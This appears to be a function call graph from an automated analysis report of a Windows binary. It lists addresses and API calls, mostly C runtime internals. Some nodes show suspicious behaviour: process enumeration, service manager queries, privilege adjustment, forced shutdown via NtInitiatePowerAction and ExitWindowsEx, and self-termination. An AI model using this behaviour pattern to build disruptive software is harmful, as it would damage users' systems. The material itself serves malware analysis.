100426 6cc580bc IsProcessorFeaturePresent 100432 6cc580e1 100426->100432 100428 6cc57883 100967 6cc59379 RaiseException 100428->100967 100430 6cc578a3 std::invalid_argument::invalid_argument 100968 6cc59379 RaiseException 100430->100968 100432->100309 100434->100326 100436 6cc56025 100435->100436 100525 6cb22020 100436->100525 100438 6cc560c6 100439 6cc56a43 std::_Facet_Register 4 API calls 100438->100439 100440 6cc560fe 100439->100440 100542 6cc57327 100440->100542 100442 6cc56112 100554 6cb21d90 100442->100554 100445 6cc561ec 100445->100405 100447 6cc56226 100562 6cb226e0 24 API calls 4 library calls 100447->100562 100449 6cc56238 100563 6cc59379 RaiseException 100449->100563 100451 6cc5624d 100452 6cb1e010 67 API calls 100451->100452 100453 6cc5625f 100452->100453 100453->100405 100455 6caf6bd5 100454->100455 100456 6cb22020 52 API calls 100455->100456 100457 6caf6c68 100456->100457 100458 6cc56a43 std::_Facet_Register 4 API calls 100457->100458 100459 6caf6ca0 100458->100459 100460 6cc57327 43 API calls 100459->100460 100461 6caf6cb4 100460->100461 100462 6cb21d90 89 API calls 100461->100462 100464 6caf6d5d 100462->100464 100463 6caf6d8e 100463->100410 100464->100463 100873 6cb22250 30 API calls 100464->100873 100466 6caf6dc8 100874 6cb226e0 24 API calls 4 library calls 100466->100874 100468 6caf6dda 100875 6cc59379 RaiseException 100468->100875 100470 6caf6def 100471 6cb1e010 67 API calls 100470->100471 100472 6caf6e0f 100471->100472 100472->100410 100474 6cc5638d 100473->100474 100876 6cc565a0 100474->100876 100476 6cc5647c 100476->100410 100480 6cc563a5 100480->100476 100894 6cb22250 30 API calls 100480->100894 100895 6cb226e0 24 API calls 4 library calls 100480->100895 100896 6cc59379 RaiseException 100480->100896 100482 6cb3203f 100481->100482 100483 6cb32053 100482->100483 100905 6cb23560 32 API calls std::_Xinvalid_argument 100482->100905 100486 6cb3210e 100483->100486 100907 6cb22250 30 API calls 100483->100907 100908 6cb226e0 24 API calls 4 library calls 100483->100908 100909 6cc59379 RaiseException 100483->100909 100489 6cb32121 100486->100489 100906 6cb237e0 32 API calls std::_Xinvalid_argument 100486->100906 100489->100410 100492 6cc55b9e 100491->100492 100494 6cc55bd1 100491->100494 100910 6cb201f0 100492->100910 100493 6cc55c83 100493->100416 100494->100493 100914 6cb22250 30 API calls 100494->100914 100498 6cc60b18 67 API calls 100498->100494 100499 6cc55cae 100915 6cb22340 24 API calls 100499->100915 100501 6cc55cbe 100916 6cc59379 RaiseException 100501->100916 100503 6cc55cc9 100504 6cb1e010 67 API calls 100503->100504 100505 6cc55d22 std::ios_base::_Ios_base_dtor 100504->100505 100505->100416 100508 6cb1e04b 100506->100508 100507 6cb1e0a3 100507->100408 100508->100507 100509 6cb201f0 64 API calls 100508->100509 100510 6cb1e098 100509->100510 100511 6cc60b18 67 API calls 100510->100511 100511->100507 100513 6caf709e 100512->100513 100514 6caf70d1 100512->100514 100516 6cb201f0 64 API calls 100513->100516 100515 6caf7183 100514->100515 100962 6cb22250 30 API calls 100514->100962 100515->100418 100517 6caf70c4 100516->100517 100519 6cc60b18 67 API calls 100517->100519 100519->100514 100520 6caf71ae 100963 6cb22340 24 API calls 100520->100963 100522 6caf71be 100964 6cc59379 RaiseException 100522->100964 100524 6caf71c9 100526 6cc56a43 std::_Facet_Register 4 API calls 100525->100526 100527 6cb2207e 100526->100527 100528 6cc57327 43 API calls 100527->100528 100529 6cb22092 100528->100529 100564 6cb22f60 42 API calls 4 library calls 100529->100564 100531 6cb220c8 100532 6cb2210d 100531->100532 100534 6cb22136 100531->100534 100533 6cb22120 100532->100533 100565 6cc56f8e 9 API calls 2 library calls 100532->100565 100533->100438 100566 6cb22250 30 API calls 100534->100566 100537 6cb2215b 100567 6cb22340 24 API calls 100537->100567 100539 6cb22171 100568 6cc59379 RaiseException 100539->100568 100541 6cb2217c 100541->100438 100543 6cc57333 __EH_prolog3 100542->100543 100569 6cc56eb5 100543->100569 100547 6cc57351 100583 6cc573ba 39 API calls std::locale::_Setgloballocale 100547->100583 100550 6cc573ac 100550->100442 100551 6cc57359 100584 6cc571b1 HeapFree GetLastError _Yarn 100551->100584 100553 6cc5736f 100575 6cc56ee6 100553->100575 100555 6cb21dc7 100554->100555 100556 6cb21ddc 100554->100556 100555->100445 100561 6cb22250 30 API calls 100555->100561 100589 6cc57447 100556->100589 100560 6cb21e82 100561->100447 100562->100449 100563->100451 100564->100531 100565->100533 100566->100537 100567->100539 100568->100541 100570 6cc56ec4 100569->100570 100571 6cc56ecb 100569->100571 100585 6cc603cd 6 API calls std::_Lockit::_Lockit 100570->100585 100573 6cc56ec9 100571->100573 100586 6cc5858b EnterCriticalSection 100571->100586 100573->100553 100582 6cc57230 6 API calls 2 library calls 100573->100582 100576 6cc56ef0 100575->100576 100577 6cc603db 100575->100577 100578 6cc56f03 100576->100578 100587 6cc58599 LeaveCriticalSection 100576->100587 100588 6cc603b6 LeaveCriticalSection 100577->100588 100578->100550 100581 6cc603e2 100581->100550 100582->100547 100583->100551 100584->100553 100585->100573 100586->100573 100587->100578 100588->100581 100590 6cc57450 100589->100590 100593 6cb21dea 100590->100593 100598 6cc5fd4a 100590->100598 100592 6cc5749c 100592->100593 100609 6cc5fa58 65 API calls 100592->100609 100593->100555 100597 6cc5c563 18 API calls __fassign 100593->100597 100595 6cc574b7 100595->100593 100610 6cc60b18 100595->100610 100597->100560 100599 6cc5fd55 __wsopen_s 100598->100599 100600 6cc5fd68 100599->100600 100601 6cc5fd88 100599->100601 100635 6cc60120 18 API calls __fassign 100600->100635 100605 6cc5fd78 100601->100605 100621 6cc6ae0c 100601->100621 100605->100592 100609->100595 100611 6cc60b24 __wsopen_s 100610->100611 100612 6cc60b43 100611->100612 100613 6cc60b2e 100611->100613 100617 6cc60b3e 100612->100617 100744 6cc5c5a9 EnterCriticalSection 100612->100744 100759 6cc60120 18 API calls __fassign 100613->100759 100615 6cc60b60 100745 6cc60b9c 100615->100745 100617->100593 100619 6cc60b6b 100760 6cc60b92 LeaveCriticalSection 100619->100760 100622 6cc6ae18 __wsopen_s 100621->100622 100637 6cc6039f EnterCriticalSection 100622->100637 100624 6cc6ae26 100638 6cc6aeb0 100624->100638 100629 6cc6af72 100630 6cc6b091 100629->100630 100662 6cc6b114 100630->100662 100633 6cc5fdcc 100636 6cc5fdf5 LeaveCriticalSection 100633->100636 100635->100605 100636->100605 100637->100624 100646 6cc6aed3 100638->100646 100639 6cc6ae33 100652 6cc6ae6c 100639->100652 100640 6cc6af2b 100657 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100640->100657 100643 6cc6af34 100658 6cc647bb HeapFree GetLastError __dosmaperr 100643->100658 100645 6cc6af3d 100645->100639 100659 6cc66c1f 6 API calls std::_Lockit::_Lockit 100645->100659 100646->100639 100646->100640 100646->100646 100655 6cc5c5a9 EnterCriticalSection 100646->100655 100656 6cc5c5bd LeaveCriticalSection 100646->100656 100648 6cc6af5c 100660 6cc5c5a9 EnterCriticalSection 100648->100660 100651 6cc6af6f 100651->100639 100661 6cc603b6 LeaveCriticalSection 100652->100661 100654 6cc5fda3 100654->100605 100654->100629 100655->100646 100656->100646 100657->100643 100658->100645 100659->100648 100660->100651 100661->100654 100663 6cc6b133 100662->100663 100664 6cc6b146 100663->100664 100666 6cc6b15b 100663->100666 100678 6cc60120 18 API calls __fassign 100664->100678 100668 6cc6b27b 100666->100668 100679 6cc73ea8 37 API calls __fassign 100666->100679 100667 6cc6b0a7 100667->100633 100675 6cc73fde 100667->100675 100668->100667 100682 6cc60120 18 API calls __fassign 100668->100682 100671 6cc6b2cb 100671->100668 100680 6cc73ea8 37 API calls __fassign 100671->100680 100673 6cc6b2e9 100673->100668 100681 6cc73ea8 37 API calls __fassign 100673->100681 100683 6cc74396 100675->100683 100678->100667 100679->100671 100680->100673 100681->100668 100682->100667 100684 6cc743a2 __wsopen_s 100683->100684 100685 6cc743a9 100684->100685 100686 6cc743d4 100684->100686 100701 6cc60120 18 API calls __fassign 100685->100701 100692 6cc73ffe 100686->100692 100691 6cc73ff9 100691->100633 100703 6cc606cb 100692->100703 100698 6cc74034 100700 6cc74066 100698->100700 100743 6cc647bb HeapFree GetLastError __dosmaperr 100698->100743 100702 6cc7442b LeaveCriticalSection __wsopen_s 100700->100702 100701->100691 100702->100691 100704 6cc5bceb __fassign 37 API calls 100703->100704 100705 6cc606dd 100704->100705 100706 6cc606ef 100705->100706 100707 6cc669d5 __wsopen_s 5 API calls 100705->100707 100708 6cc5bdf6 100706->100708 100707->100706 100709 6cc5be4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100708->100709 100710 6cc5be0e 100709->100710 100710->100698 100711 6cc7406c 100710->100711 100712 6cc744ec __wsopen_s 18 API calls 100711->100712 100713 6cc74089 100712->100713 100714 6cc7160c __wsopen_s 14 API calls 100713->100714 100718 6cc7409e __dosmaperr 100713->100718 100715 6cc740bc 100714->100715 100716 6cc74457 __wsopen_s CreateFileW 100715->100716 100715->100718 100722 6cc74115 100716->100722 100717 6cc74192 GetFileType 100720 6cc741e4 100717->100720 100721 6cc7419d GetLastError 100717->100721 100718->100698 100719 6cc74167 GetLastError 100719->100718 100726 6cc717b0 __wsopen_s SetStdHandle 100720->100726 100723 6cc5f9f2 __dosmaperr 100721->100723 100722->100717 100722->100719 100724 6cc74457 __wsopen_s CreateFileW 100722->100724 100725 6cc741ab CloseHandle 100723->100725 100727 6cc7415a 100724->100727 100725->100718 100739 6cc741d4 100725->100739 100728 6cc74205 100726->100728 100727->100717 100727->100719 100729 6cc74251 100728->100729 100731 6cc74666 __wsopen_s 70 API calls 100728->100731 100730 6cc74710 __wsopen_s 70 API calls 100729->100730 100734 6cc74258 100729->100734 100732 6cc74286 100730->100732 100731->100729 100733 6cc74294 100732->100733 100732->100734 100733->100718 100736 6cc74310 CloseHandle 100733->100736 100735 6cc6b925 __wsopen_s 21 API calls 100734->100735 100735->100718 100737 6cc74457 __wsopen_s CreateFileW 100736->100737 100738 6cc7433b 100737->100738 100738->100739 100740 6cc74345 GetLastError 100738->100740 100739->100718 100741 6cc74351 __dosmaperr 100740->100741 100742 6cc7171f __wsopen_s SetStdHandle 100741->100742 100742->100739 100743->100700 100744->100615 100746 6cc60bbe 100745->100746 100747 6cc60ba9 100745->100747 100751 6cc60bb9 100746->100751 100761 6cc60cb9 100746->100761 100783 6cc60120 18 API calls __fassign 100747->100783 100751->100619 100755 6cc60be1 100776 6cc6b898 100755->100776 100757 6cc60be7 100757->100751 100784 6cc647bb HeapFree GetLastError __dosmaperr 100757->100784 100759->100617 100760->100617 100762 6cc60cd1 100761->100762 100763 6cc60bd3 100761->100763 100762->100763 100764 6cc69c60 18 API calls 100762->100764 100767 6cc6873e 100763->100767 100765 6cc60cef 100764->100765 100785 6cc6bb6c 100765->100785 100768 6cc68755 100767->100768 100769 6cc60bdb 100767->100769 100768->100769 100841 6cc647bb HeapFree GetLastError __dosmaperr 100768->100841 100771 6cc69c60 100769->100771 100772 6cc69c81 100771->100772 100773 6cc69c6c 100771->100773 100772->100755 100842 6cc60120 18 API calls __fassign 100773->100842 100775 6cc69c7c 100775->100755 100777 6cc6b8be 100776->100777 100781 6cc6b8a9 __dosmaperr 100776->100781 100778 6cc6b8e5 100777->100778 100780 6cc6b907 __dosmaperr 100777->100780 100843 6cc6b9c1 100778->100843 100851 6cc60120 18 API calls __fassign 100780->100851 100781->100757 100783->100751 100784->100751 100786 6cc6bb78 __wsopen_s 100785->100786 100787 6cc6bbca 100786->100787 100788 6cc6bc33 __dosmaperr 100786->100788 100792 6cc6bb80 __dosmaperr 100786->100792 100796 6cc71990 EnterCriticalSection 100787->100796 100826 6cc60120 18 API calls __fassign 100788->100826 100790 6cc6bbd0 100794 6cc6bbec __dosmaperr 100790->100794 100797 6cc6bc5e 100790->100797 100792->100763 100825 6cc6bc2b LeaveCriticalSection __wsopen_s 100794->100825 100796->100790 100798 6cc6bc80 100797->100798 100824 6cc6bc9c __dosmaperr 100797->100824 100799 6cc6bcd4 100798->100799 100800 6cc6bc84 __dosmaperr 100798->100800 100801 6cc6bce7 100799->100801 100835 6cc6ac69 20 API calls __wsopen_s 100799->100835 100834 6cc60120 18 API calls __fassign 100800->100834 100827 6cc6be40 100801->100827 100806 6cc6bd3c 100810 6cc6bd95 WriteFile 100806->100810 100811 6cc6bd50 100806->100811 100807 6cc6bcfd 100808 6cc6bd26 100807->100808 100809 6cc6bd01 100807->100809 100837 6cc6beb1 43 API calls 5 library calls 100808->100837 100809->100824 100836 6cc6c25b 6 API calls __wsopen_s 100809->100836 100813 6cc6bdb9 GetLastError 100810->100813 100810->100824 100814 6cc6bd85 100811->100814 100815 6cc6bd5b 100811->100815 100813->100824 100840 6cc6c2c3 7 API calls 2 library calls 100814->100840 100818 6cc6bd75 100815->100818 100819 6cc6bd60 100815->100819 100839 6cc6c487 8 API calls 3 library calls 100818->100839 100822 6cc6bd65 100819->100822 100819->100824 100821 6cc6bd73 100821->100824 100838 6cc6c39e 7 API calls 2 library calls 100822->100838 100824->100794 100825->100792 100826->100792 100828 6cc719e5 __wsopen_s 18 API calls 100827->100828 100829 6cc6be51 100828->100829 100830 6cc6bcf8 100829->100830 100831 6cc649b2 __Getctype 37 API calls 100829->100831 100830->100806 100830->100807 100832 6cc6be74 100831->100832 100832->100830 100833 6cc6be8e GetConsoleMode 100832->100833 100833->100830 100834->100824 100835->100801 100836->100824 100837->100824 100838->100821 100839->100821 100840->100821 100841->100769 100842->100775 100844 6cc6b9cd __wsopen_s 100843->100844 100852 6cc71990 EnterCriticalSection 100844->100852 100846 6cc6b9db 100848 6cc6ba08 100846->100848 100853 6cc6b925 100846->100853 100866 6cc6ba41 LeaveCriticalSection __wsopen_s 100848->100866 100850 6cc6ba2a 100850->100781 100851->100781 100852->100846 100867 6cc715a2 100853->100867 100855 6cc6b93b 100872 6cc7171f SetStdHandle __dosmaperr __wsopen_s 100855->100872 100856 6cc6b935 100856->100855 100858 6cc715a2 __wsopen_s 18 API calls 100856->100858 100865 6cc6b96d 100856->100865 100860 6cc6b964 100858->100860 100859 6cc715a2 __wsopen_s 18 API calls 100861 6cc6b979 CloseHandle 100859->100861 100863 6cc715a2 __wsopen_s 18 API calls 100860->100863 100861->100855 100864 6cc6b985 GetLastError 100861->100864 100862 6cc6b993 __dosmaperr 100862->100848 100863->100865 100864->100855 100865->100855 100865->100859 100866->100850 100868 6cc715c4 __dosmaperr 100867->100868 100870 6cc715af __dosmaperr 100867->100870 100869 6cc715e9 100868->100869 100871 6cc60120 __fassign 18 API calls 100868->100871 100869->100856 100870->100856 100871->100870 100872->100862 100873->100466 100874->100468 100875->100470 100877 6cc565dc 100876->100877 100878 6cc56608 100876->100878 100879 6cc56601 100877->100879 100899 6cb22250 30 API calls 100877->100899 100884 6cc56619 100878->100884 100897 6cb23560 32 API calls std::_Xinvalid_argument 100878->100897 100879->100480 100882 6cc567e8 100900 6cb22340 24 API calls 100882->100900 100884->100879 100898 6cb22f60 42 API calls 4 library calls 100884->100898 100885 6cc567f7 100901 6cc59379 RaiseException 100885->100901 100889 6cc56827 100903 6cb22340 24 API calls 100889->100903 100891 6cc5683d 100904 6cc59379 RaiseException 100891->100904 100893 6cc56653 100893->100879 100902 6cb22250 30 API calls 100893->100902 100894->100480 100895->100480 100896->100480 100897->100884 100898->100893 100899->100882 100900->100885 100901->100893 100902->100889 100903->100891 100904->100879 100905->100483 100906->100489 100907->100483 100908->100483 100909->100483 100911 6cb2022e 100910->100911 100912 6cb204d6 100911->100912 100917 6cc617db 100911->100917 100912->100498 100914->100499 100915->100501 100916->100503 100918 6cc61806 100917->100918 100919 6cc617e9 100917->100919 100918->100911 100919->100918 100920 6cc6180a 100919->100920 100923 6cc617f6 100919->100923 100925 6cc61a02 100920->100925 100933 6cc60120 18 API calls __fassign 100923->100933 100926 6cc61a0e __wsopen_s 100925->100926 100934 6cc5c5a9 EnterCriticalSection 100926->100934 100928 6cc61a1c 100935 6cc619bf 100928->100935 100932 6cc6183c 100932->100911 100933->100918 100934->100928 100943 6cc685a6 100935->100943 100941 6cc619f9 100942 6cc61a51 LeaveCriticalSection 100941->100942 100942->100932 100944 6cc69c60 18 API calls 100943->100944 100945 6cc685b7 100944->100945 100946 6cc719e5 __wsopen_s 18 API calls 100945->100946 100948 6cc685bd __wsopen_s 100946->100948 100947 6cc619d3 100950 6cc6183e 100947->100950 100948->100947 100960 6cc647bb HeapFree GetLastError __dosmaperr 100948->100960 100952 6cc61850 100950->100952 100954 6cc6186e 100950->100954 100951 6cc6185e 100961 6cc60120 18 API calls __fassign 100951->100961 100952->100951 100952->100954 100955 6cc61886 _Yarn 100952->100955 100959 6cc68659 62 API calls 100954->100959 100955->100954 100956 6cc60cb9 62 API calls 100955->100956 100957 6cc69c60 18 API calls 100955->100957 100958 6cc6bb6c __wsopen_s 62 API calls 100955->100958 100956->100955 100957->100955 100958->100955 100959->100941 100960->100947 100961->100954 100962->100520 100963->100522 100964->100524 100965->100421 100966->100428 100967->100430 100968->100423 100969->100426 100970 6cc5ef3f 100971 6cc5ef4b __wsopen_s 100970->100971 100972 6cc5ef52 GetLastError ExitThread 100971->100972 100973 6cc5ef5f 100971->100973 100982 6cc649b2 GetLastError 100973->100982 100978 6cc5ef7b 101015 6cc5eeaa 16 API calls 2 library calls 100978->101015 100981 6cc5ef9d 100983 6cc649cf 100982->100983 100984 6cc649c9 100982->100984 100989 6cc649d5 SetLastError 100983->100989 101017 6cc66b62 6 API calls std::_Lockit::_Lockit 100983->101017 101016 6cc66b23 6 API calls std::_Lockit::_Lockit 100984->101016 100987 6cc649ed 100988 6cc649f1 100987->100988 100987->100989 101018 6cc671e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100988->101018 100995 6cc5ef64 100989->100995 100996 6cc64a69 100989->100996 100991 6cc649fd 100993 6cc64a05 100991->100993 100994 6cc64a1c 100991->100994 101019 6cc66b62 6 API calls std::_Lockit::_Lockit 100993->101019 101021 6cc66b62 6 API calls std::_Lockit::_Lockit 100994->101021 101009 6cc69d66 100995->101009 101024 6cc60ac9 37 API calls std::locale::_Setgloballocale 100996->101024 101000 6cc64a13 101020 6cc647bb HeapFree GetLastError __dosmaperr 101000->101020 101002 6cc64a28 101003 6cc64a2c 101002->101003 101004 6cc64a3d 101002->101004 101022 6cc66b62 6 API calls std::_Lockit::_Lockit 101003->101022 101023 6cc647bb HeapFree GetLastError __dosmaperr 101004->101023 101007 6cc64a19 101007->100989 101010 6cc69d78 GetPEB 101009->101010 101013 6cc5ef6f 101009->101013 101011 6cc69d8b 101010->101011 101010->101013 101025 6cc66e18 5 API calls std::_Lockit::_Lockit 101011->101025 101013->100978 101014 6cc66d6f 5 API calls std::_Lockit::_Lockit 101013->101014 101014->100978 101015->100981 101016->100983 101017->100987 101018->100991 101019->101000 101020->101007 101021->101002 101022->101000 101023->101007 101025->101013 101026 6cae3b72 101027 6cc56a43 std::_Facet_Register 4 API calls 101026->101027 101033 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101027->101033 101028 6cc4aec0 2 API calls 101028->101033 101031 6caf6ba0 104 API calls 101031->101033 101033->101028 101033->101031 101034 6caf7090 77 API calls 101033->101034 101035 6cb1e010 67 API calls 101033->101035 101036 6caf639e 101033->101036 101039 6caf6e60 101033->101039 101034->101033 101035->101033 101049 6cc60130 18 API calls 2 library calls 101036->101049 101040 6caf6e9f 101039->101040 101043 6caf6eb3 101040->101043 101050 6cb23560 32 API calls std::_Xinvalid_argument 101040->101050 101046 6caf6f5b 101043->101046 101052 6cb22250 30 API calls 101043->101052 101053 6cb226e0 24 API calls 4 library calls 101043->101053 101054 6cc59379 RaiseException 101043->101054 101045 6caf6f6e 101045->101033 101046->101045 101051 6cb237e0 32 API calls std::_Xinvalid_argument 101046->101051 101050->101043 101051->101045 101052->101043 101053->101043 101054->101043 101055 6caef8a3 101056 6caef887 101055->101056 101057 6caf02ac GetCurrentProcess TerminateProcess 101056->101057 101058 6caf02ca 101057->101058 101059 6cad4b53 101060 6cc56a43 std::_Facet_Register 4 API calls 101059->101060 101061 6cad4b5c _Yarn 101060->101061 101062 6cc4aec0 2 API calls 101061->101062 101067 6cad4bae std::ios_base::_Ios_base_dtor 101062->101067 101063 6caf639e 101240 6cc60130 18 API calls 2 library calls 101063->101240 101065 6cad5164 CreateFileA CloseHandle 101071 6cad51ec 101065->101071 101066 6cad4cff 101067->101063 101067->101065 101067->101066 101068 6cae245a _Yarn _strlen 101067->101068 101068->101063 101070 6cc4aec0 2 API calls 101068->101070 101085 6cae2a83 std::ios_base::_Ios_base_dtor 101070->101085 101217 6cc55120 OpenSCManagerA 101071->101217 101073 6cadfc00 101233 6cc55240 CreateToolhelp32Snapshot 101073->101233 101076 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101112 6cad5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 101076->101112 101078 6cae37d0 Sleep 101123 6cae37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101078->101123 101079 6cc4aec0 2 API calls 101079->101112 101080 6caf63b2 101241 6cad15e0 18 API calls std::ios_base::_Ios_base_dtor 101080->101241 101081 6cc55240 4 API calls 101099 6cae053a 101081->101099 101083 6cc55240 4 API calls 101106 6cae12e2 101083->101106 101084 6caf64f8 101085->101063 101221 6cc40390 101085->101221 101086 6cadffe3 101086->101081 101091 6cae0abc 101086->101091 101087 6caf6ba0 104 API calls 101087->101112 101088 6caf6e60 32 API calls 101088->101112 101090 6cc55240 4 API calls 101090->101091 101091->101068 101091->101083 101092 6caf7090 77 API calls 101092->101112 101093 6cae211c 101093->101068 101095 6cae241a 101093->101095 101094 6cc55240 4 API calls 101114 6cae1dd9 101094->101114 101098 6cc40390 11 API calls 101095->101098 101096 6cc4aec0 2 API calls 101096->101123 101097 6cb1e010 67 API calls 101097->101112 101101 6cae244d 101098->101101 101099->101090 101099->101091 101100 6cad6722 101230 6cc51880 25 API calls 4 library calls 101100->101230 101239 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101101->101239 101103 6cae2452 Sleep 101103->101068 101104 6cad6162 101105 6cae16ac 101106->101093 101106->101094 101106->101105 101107 6cad740b 101108 6cc54ff0 4 API calls 101107->101108 101116 6cad775a _strlen 101108->101116 101109 6cc55240 4 API calls 101109->101093 101110 6caf6ba0 104 API calls 101110->101123 101111 6caf6e60 32 API calls 101111->101123 101112->101063 101112->101073 101112->101076 101112->101079 101112->101087 101112->101088 101112->101092 101112->101097 101112->101100 101112->101104 101113 6caf7090 77 API calls 101113->101123 101114->101093 101114->101109 101115 6cb1e010 67 API calls 101115->101123 101116->101063 101117 6cad7ba9 101116->101117 101118 6cad7b92 101116->101118 101121 6cad7b43 _Yarn 101116->101121 101120 6cc56a43 std::_Facet_Register 4 API calls 101117->101120 101119 6cc56a43 std::_Facet_Register 4 API calls 101118->101119 101119->101121 101120->101121 101122 6cc4aec0 2 API calls 101121->101122 101132 6cad7be7 std::ios_base::_Ios_base_dtor 101122->101132 101123->101063 101123->101096 101123->101110 101123->101111 101123->101113 101123->101115 101124 6cc54ff0 4 API calls 101135 6cad8a07 101124->101135 101125 6cad9d7f 101129 6cc56a43 std::_Facet_Register 4 API calls 101125->101129 101126 6cad9d68 101128 6cc56a43 std::_Facet_Register 4 API calls 101126->101128 101127 6cad962c _strlen 101127->101063 101127->101125 101127->101126 101130 6cad9d18 _Yarn 101127->101130 101128->101130 101129->101130 101131 6cc4aec0 2 API calls 101130->101131 101139 6cad9dbd std::ios_base::_Ios_base_dtor 101131->101139 101132->101063 101132->101124 101132->101127 101133 6cad8387 101132->101133 101134 6cc54ff0 4 API calls 101143 6cad9120 101134->101143 101135->101134 101136 6cc54ff0 4 API calls 101153 6cada215 _strlen 101136->101153 101137 6cc54ff0 4 API calls 101138 6cad9624 101137->101138 101231 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101138->101231 101139->101063 101139->101136 101144 6cade8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101139->101144 101140 6cc56a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101140->101144 101142 6cc4aec0 2 API calls 101142->101144 101143->101137 101144->101063 101144->101140 101144->101142 101145 6cadf7b1 101144->101145 101146 6caded02 Sleep 101144->101146 101232 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101145->101232 101165 6cade8c1 101146->101165 101148 6cade8dd GetCurrentProcess TerminateProcess 101148->101144 101149 6cada9bb 101152 6cc56a43 std::_Facet_Register 4 API calls 101149->101152 101150 6cada9a4 101151 6cc56a43 std::_Facet_Register 4 API calls 101150->101151 101158 6cada953 _Yarn _strlen 101151->101158 101152->101158 101153->101063 101153->101149 101153->101150 101153->101158 101154 6cc54ff0 4 API calls 101154->101165 101155 6cadfbb8 101156 6cadfbe8 ExitWindowsEx Sleep 101155->101156 101156->101073 101157 6cadf7c0 101157->101155 101158->101080 101159 6cadb009 101158->101159 101160 6cadaff0 101158->101160 101163 6cadafa0 _Yarn 101158->101163 101161 6cc56a43 std::_Facet_Register 4 API calls 101159->101161 101162 6cc56a43 std::_Facet_Register 4 API calls 101160->101162 101161->101163 101162->101163 101164 6cc55960 104 API calls 101163->101164 101166 6cadb059 std::ios_base::_Ios_base_dtor _strlen 101164->101166 101165->101144 101165->101148 101165->101154 101166->101063 101167 6cadb42c 101166->101167 101168 6cadb443 101166->101168 101171 6cadb3da _Yarn _strlen 101166->101171 101169 6cc56a43 std::_Facet_Register 4 API calls 101167->101169 101170 6cc56a43 std::_Facet_Register 4 API calls 101168->101170 101169->101171 101170->101171 101171->101080 101172 6cadb79e 101171->101172 101173 6cadb7b7 101171->101173 101176 6cadb751 _Yarn 101171->101176 101174 6cc56a43 std::_Facet_Register 4 API calls 101172->101174 101175 6cc56a43 std::_Facet_Register 4 API calls 101173->101175 101174->101176 101175->101176 101177 6cc55960 104 API calls 101176->101177 101178 6cadb804 std::ios_base::_Ios_base_dtor _strlen 101177->101178 101178->101063 101179 6cadbc0f 101178->101179 101180 6cadbc26 101178->101180 101183 6cadbbbd _Yarn _strlen 101178->101183 101181 6cc56a43 std::_Facet_Register 4 API calls 101179->101181 101182 6cc56a43 std::_Facet_Register 4 API calls 101180->101182 101181->101183 101182->101183 101183->101080 101184 6cadc08e 101183->101184 101185 6cadc075 101183->101185 101188 6cadc028 _Yarn 101183->101188 101187 6cc56a43 std::_Facet_Register 4 API calls 101184->101187 101186 6cc56a43 std::_Facet_Register 4 API calls 101185->101186 101186->101188 101187->101188 101189 6cc55960 104 API calls 101188->101189 101194 6cadc0db std::ios_base::_Ios_base_dtor _strlen 101189->101194 101190 6cadc7bc 101193 6cc56a43 std::_Facet_Register 4 API calls 101190->101193 101191 6cadc7a5 101192 6cc56a43 std::_Facet_Register 4 API calls 101191->101192 101201 6cadc753 _Yarn _strlen 101192->101201 101193->101201 101194->101063 101194->101190 101194->101191 101194->101201 101195 6cadd3ed 101197 6cc56a43 std::_Facet_Register 4 API calls 101195->101197 101196 6cadd406 101198 6cc56a43 std::_Facet_Register 4 API calls 101196->101198 101199 6cadd39a _Yarn 101197->101199 101198->101199 101200 6cc55960 104 API calls 101199->101200 101202 6cadd458 std::ios_base::_Ios_base_dtor _strlen 101200->101202 101201->101080 101201->101195 101201->101196 101201->101199 101207 6cadcb2f 101201->101207 101202->101063 101203 6cadd8bb 101202->101203 101204 6cadd8a4 101202->101204 101208 6cadd852 _Yarn _strlen 101202->101208 101206 6cc56a43 std::_Facet_Register 4 API calls 101203->101206 101205 6cc56a43 std::_Facet_Register 4 API calls 101204->101205 101205->101208 101206->101208 101208->101080 101209 6caddccf 101208->101209 101210 6caddcb6 101208->101210 101213 6caddc69 _Yarn 101208->101213 101212 6cc56a43 std::_Facet_Register 4 API calls 101209->101212 101211 6cc56a43 std::_Facet_Register 4 API calls 101210->101211 101211->101213 101212->101213 101214 6cc55960 104 API calls 101213->101214 101216 6caddd1c std::ios_base::_Ios_base_dtor 101214->101216 101215 6cc54ff0 4 API calls 101215->101144 101216->101063 101216->101215 101219 6cc55156 101217->101219 101218 6cc551e8 OpenServiceA 101218->101219 101219->101218 101220 6cc5522f 101219->101220 101220->101112 101222 6cc403a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101221->101222 101223 6cc4310e CloseHandle 101222->101223 101224 6cc43f5f CloseHandle 101222->101224 101225 6cc4251b CloseHandle 101222->101225 101226 6cae37cb 101222->101226 101227 6cc2c1e0 WriteFile WriteFile WriteFile ReadFile 101222->101227 101242 6cc2b730 101222->101242 101223->101222 101224->101222 101225->101222 101229 6cc55d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101226->101229 101227->101222 101229->101078 101230->101107 101231->101127 101232->101157 101235 6cc552a0 std::locale::_Setgloballocale 101233->101235 101234 6cc55277 CloseHandle 101234->101235 101235->101234 101236 6cc55320 Process32NextW 101235->101236 101237 6cc553b1 101235->101237 101238 6cc55345 Process32FirstW 101235->101238 101236->101235 101237->101086 101238->101235 101239->101103 101241->101084 101243 6cc2b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101242->101243 101244 6cc2c180 101243->101244 101245 6cc2bced CreateFileA 101243->101245 101247 6cc2aa30 101243->101247 101244->101222 101245->101243 101250 6cc2aa43 __wsopen_s std::locale::_Setgloballocale 101247->101250 101248 